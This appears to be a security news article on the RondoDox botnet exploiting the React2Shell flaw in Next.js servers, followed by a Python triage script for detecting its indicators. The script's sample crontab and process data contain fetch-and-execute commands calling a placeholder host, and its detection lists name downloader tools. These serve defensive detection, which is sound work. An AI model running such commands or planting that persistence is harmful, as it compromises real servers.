
Next.js Servers Compromised by RondoDox Botnet Exploiting React2Shell Vulnerability


The RondoDox botnet is exploiting the critical React2Shell vulnerability (CVE-2025-55182) to compromise unpatched Next.js servers and deploy malware and cryptominers on them.

First documented by Fortinet in July 2025, RondoDox is a large botnet that targets a range of zero-day vulnerabilities in attacks worldwide. More recently, VulnCheck found new RondoDox variants carrying exploits for CVE-2025-24893, a critical remote code execution (RCE) flaw in the XWiki Platform.

A new report from cybersecurity firm CloudSEK says RondoDox has been scanning for vulnerable Next.js servers since December 8 and deploying botnet clients on the ones it compromises.

React2Shell is an unauthenticated remote code execution vulnerability that can be triggered with a single HTTP request. It affects every framework that implements the React Server Components (RSC) ‘Flight’ protocol, including Next.js, whose Server Actions are built on it.

The vulnerability has already been used by several threat actors to breach organizations; North Korean hackers, for example, used React2Shell to deliver a new malware strain called EtherRAT.

As of December 30, the Shadowserver Foundation has reported over 94,000 internet-exposed assets vulnerable to React2Shell.

CloudSEK says RondoDox has moved through three distinct operational phases in 2025:

  • Reconnaissance and vulnerability testing from March to April 2025
  • Automated web app exploitation from April to June 2025
  • Large-scale IoT botnet deployment from July to the present

For React2Shell specifically, the researchers say RondoDox has stepped up its exploitation, with more than 40 exploit attempts recorded within six days in December.

In this third phase, the botnet also runs hourly exploitation waves against a variety of routers to recruit new bots.

Once it has identified an exploitable server, CloudSEK reports, RondoDox delivers a set of payloads: a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a Mirai variant (/nuts/x86).

The ‘bolts’ component kills competing botnet malware, establishes persistence through /etc/crontab, and terminates any process not on its whitelist every 45 seconds, according to the researchers.

CloudSEK's recommendations for defending against RondoDox include auditing and patching Next.js Server Actions, segregating IoT devices into dedicated VLANs, and monitoring for suspicious process executions.
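The payload names, crontab persistence and process behaviour described above give a responder concrete things to look for on a suspect host. The script below is an added example written for this article, not CloudSEK's tooling or anything from the botnet itself. It scans two artefacts an investigator would collect from a Next.js server, a copy of /etc/crontab and `ps -eo user,pid,args` output, for the three payload paths named in the report, for cron entries or binaries executing from scratch directories, and for the web-application account spawning a downloader. The sample inputs are constructed; the host `payload.invalid`, the `nextjs` account, the scratch-directory and downloader lists are assumptions to tune for your own environment.

```python
"""Host triage for the RondoDox indicators in the CloudSEK report.

Added example, not CloudSEK's or the article's code. Scans a crontab and a
process listing for the payload paths the report names, for persistence and
execution from scratch directories, and for the web-app account spawning a
downloader. All sample data below is constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

# Payload paths named in the report.
PAYLOAD_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")

# Directories a web-application account should not execute from (assumption).
SCRATCH_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# Commands a Next.js worker has no business spawning (assumption).
DOWNLOADERS = ("curl", "wget")


@dataclass(frozen=True)
class Finding:
    source: str    # "crontab" or "process"
    evidence: str  # the offending line
    reason: str


def _payload_hit(text: str) -> bool:
    return any(p in text for p in PAYLOAD_PATHS)


def _scratch_exec(text: str) -> bool:
    return any(d in text for d in SCRATCH_DIRS)


def scan_crontab(crontab: str) -> list[Finding]:
    """Flag crontab entries that fetch a known payload or run from a scratch dir."""
    findings = []
    for raw in crontab.splitlines():
        line = raw.strip()
        # Skip blanks, comments and VAR=value lines such as SHELL=/bin/sh.
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if _payload_hit(line):
            findings.append(Finding("crontab", line, "references a known payload path"))
        elif _scratch_exec(line):
            findings.append(Finding("crontab", line, "executes from a scratch directory"))
    return findings


def scan_processes(ps_output: str, web_users: tuple[str, ...] = ("nextjs",)) -> list[Finding]:
    """Flag processes that reference a payload, run from a scratch dir, or show the
    web-app account spawning a downloader. Expects `ps -eo user,pid,args` output."""
    findings = []
    for raw in ps_output.splitlines():
        parts = raw.split(None, 2)
        if len(parts) < 3 or parts[0].upper() == "USER":
            continue  # short lines and the header
        user, _pid, cmd = parts
        binary = cmd.split()[0]
        if _payload_hit(cmd):
            findings.append(Finding("process", raw.strip(), "command line references a known payload path"))
        elif _scratch_exec(binary):
            findings.append(Finding("process", raw.strip(), "binary executing from a scratch directory"))
        elif user in web_users and binary.rsplit("/", 1)[-1] in DOWNLOADERS:
            findings.append(Finding("process", raw.strip(), "web-app account spawned a downloader"))
    return findings


def triage(crontab: str, ps_output: str) -> list[Finding]:
    return scan_crontab(crontab) + scan_processes(ps_output)


# Constructed sample artefacts; payload.invalid and 203.0.113.5 are placeholders.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root curl -s http://payload.invalid/nuts/bolts -o /tmp/.b && chmod +x /tmp/.b && /tmp/.b
"""

SAMPLE_PS = """\
USER       PID COMMAND
root         1 /sbin/init
nextjs    2140 node /srv/app/node_modules/.bin/next start
nextjs    2311 sh -c wget -q http://payload.invalid/nuts/x86 -O /dev/shm/x86
nextjs    2315 /dev/shm/x86
nextjs    2400 curl -s http://203.0.113.5/x
root      2320 /usr/sbin/sshd -D
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB, SAMPLE_PS):
        print(f"[{f.source}] {f.reason}: {f.evidence}")
```

The three checks are deliberately independent: the payload-path match catches the specific campaign, while the scratch-directory and downloader checks will still fire when the operators rename the payloads, which is the more likely evolution. Run it against real `ps` output with the account your Next.js process actually runs as in `web_users`.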
